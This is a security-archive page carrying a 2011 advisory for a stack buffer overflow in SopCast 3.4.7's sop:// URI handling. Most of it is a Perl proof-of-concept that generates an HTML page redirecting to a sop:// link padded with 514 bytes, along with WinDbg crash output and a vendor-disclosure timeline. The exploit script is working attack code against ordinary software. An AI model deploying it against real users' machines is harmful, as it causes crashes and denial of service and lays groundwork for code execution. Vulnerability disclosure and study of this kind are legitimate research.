exploit the possibilities

SopCast 3.4.7 Stack Buffer Overflow

SopCast 3.4.7 Stack Buffer Overflow
Posted Dec 5, 2011
Authored by LiquidWorm | Site zeroscience.mk

SopCast suffers from a stack-based buffer overflow vulnerability when parsing the user input using the SoP protocol in sopocx.ocx module allowing the attacker to gain system access and execute arbitrary code on the affected machine. Version 3.4.7.45585 is affected.

tags | exploit, overflow, arbitrary, protocol
MD5 | 3935f4f6555cdb67b0b2fab5f1fd5ac9

SopCast 3.4.7 Stack Buffer Overflow

Change Mirror Download
#!/usr/bin/perl
#
#
# SopCast 3.4.7 sop:// URI Handling Remote Stack Buffer Overflow PoC
#
#
# Vendor: SopCast.com
# Product web page: http://www.sopcast.com
# Affected version: 3.4.7.45585
#
# Summary: SopCast is a simple, free way to broadcast video and audio or watch
# the video and listen to radio on the Internet. Adopting P2P(Peer-to-Peer)
# technology, It is very efficient and easy to use. SoP is the abbreviation for
# Streaming over P2P. Sopcast is a Streaming Direct Broadcasting System based
# on P2P. The core is the communication protocol produced by Sopcast Team, which
# is named sop://, or SoP technology.
#
# Desc: SopCast suffers from a stack-based buffer overflow vulnerability when
# parsing the user input using the SoP protocol in sopocx.ocx module allowing
# the attacker to gain system access and execute arbitrary code on the affected
# machine. The issue is triggered when adding 514 bytes of string to the sop://
# protocol (GET), causing the app to open the link (channel) and crashing. The
# application will crash even with 'sop://[anything]' because it fails to properly
# sanitize and handle the uri segment, but with exactly 514 bytes the stack gets
# overflowed, poping out the Buffer Overrun error box. Unsuccessful atempts causes
# denial of service scenario. You can also edit the '<address>' element in the
# favorites.xml file as the attack vector.
#
#
# ================================================================================
#
# (e50.fcc): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=01092f48 ebx=00f8e8e8 ecx=000000b7 edx=0116a7dc esi=00000001 edi=0104af88
# eip=100a350f esp=0618febc ebp=0618ffa8 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
# *** WARNING: Unable to verify checksum for C:\PROGRA~1\SopCast\sopocx.ocx
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\PROGRA~1\SopCast\sopocx.ocx -
# sopocx!DllUnregisterServer+0x9217f:
# 100a350f 0fb606 movzx eax,byte ptr [esi] ds:0023:00000001=??
# ...
# 0:000> d esp+400
# 0012ea78 18 10 ea 00 73 00 6f 00-70 00 3a 00 2f 00 2f 00 ....s.o.p.:././.
# 0012ea88 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a.
# 0012ea98 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a.
# 0012eaa8 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a.
# 0012eab8 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a.
# 0012eac8 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a.
# 0012ead8 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a.
# 0012eae8 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a.
# ...
# 0:008> d edx+1000
# 00f2f8b0 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a.
# 00f2f8c0 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a.
# 00f2f8d0 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a.
# 00f2f8e0 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a.
# 00f2f8f0 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a.
# 00f2f900 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a.
# 00f2f910 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a.
# 00f2f920 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a.
# 0:008> d eax+2000
# 00f320e8 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a.
# 00f320f8 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a.
# 00f32108 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a.
# 00f32118 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a.
# 00f32128 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a.
# 00f32138 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a.
# 00f32148 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a.
# 00f32158 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a.
#
# ================================================================================
#
#
# Tested on: Microsoft Windows XP Professional SP3 (English)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Zero Science Lab - http://www.zeroscience.mk
#
#
# Vendor status:
#
# [30.11.2011] Vulnerability discovered.
# [01.12.2011] Contact with the vendor with sent detailed info.
# [04.12.2011] No response from the vendor.
# [05.12.2011] Public security advisory released.
#
#
# Advisory ID: ZSL-2011-5063
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5063.php
#
#
# 30.11.2011
#

use strict;

my $fname = "thricer.html";

print "\n\nooooooooooooooooooooooooooooooooooooooooooooooooo\no"." "x47 ."o\n";
print "o\tSopCast 3.4.7 URI Handling BoF PoC" . " "x6 . "o\no"." "x47 ."o\no\t\t";
print "ID: ZSL-2011-5063"." "x15 ."o\no"." "x47 ."o\n";
print "o\tCopyleft (c) 2011, Zero Science Lab"." "x5 ."o\no"." "x47 ."o\n";
print "ooooooooooooooooooooooooooooooooooooooooooooooooo\n\n";

my $curiosity = "\n</center>\n</body>\n</html>";
my $unknown = "<form>\n<input type=\"button\" value=\"Push The Button!\" ";
my $with = "onclick=\"exploit()\" />" . "\n</form>";
my $of = "<body bgcolor=\"#002233\">\n<br /><br />\n<center>\n";
my $fear = "</script>\n</head>\n";
my $replace = "<html>\n<head>\n<title>".
"SopCast 3.4.7 sop:// URI Handling Remote Stack Buffer".
" Overflow PoC</title>\n".
"<script type=\"text/javascript\">\n";
my $code = "window.location.href = \"sop://"."A"x514 ."\";\n";
my $the = "function exploit()\n{\n" . $code . "}\n";

my $payload = $replace.$the.$fear.$of.$unknown.$with.$curiosity;

print "\n\n[*] Creating $fname file...\n";
open ENOUGH, ">./$fname" || die "\nCan't open $fname: $!";
print ENOUGH $payload; print "\n"; sleep 1;
print "\n[.] File successfully scripted!\n\n";
close ENOUGH;

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    24 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    7 Files
  • 4
    Oct 4th
    4 Files
  • 5
    Oct 5th
    10 Files
  • 6
    Oct 6th
    1 Files
  • 7
    Oct 7th
    21 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    5 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    17 Files
  • 12
    Oct 12th
    4 Files
  • 13
    Oct 13th
    4 Files
  • 14
    Oct 14th
    15 Files
  • 15
    Oct 15th
    19 Files
  • 16
    Oct 16th
    25 Files
  • 17
    Oct 17th
    17 Files
  • 18
    Oct 18th
    7 Files
  • 19
    Oct 19th
    1 Files
  • 20
    Oct 20th
    1 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close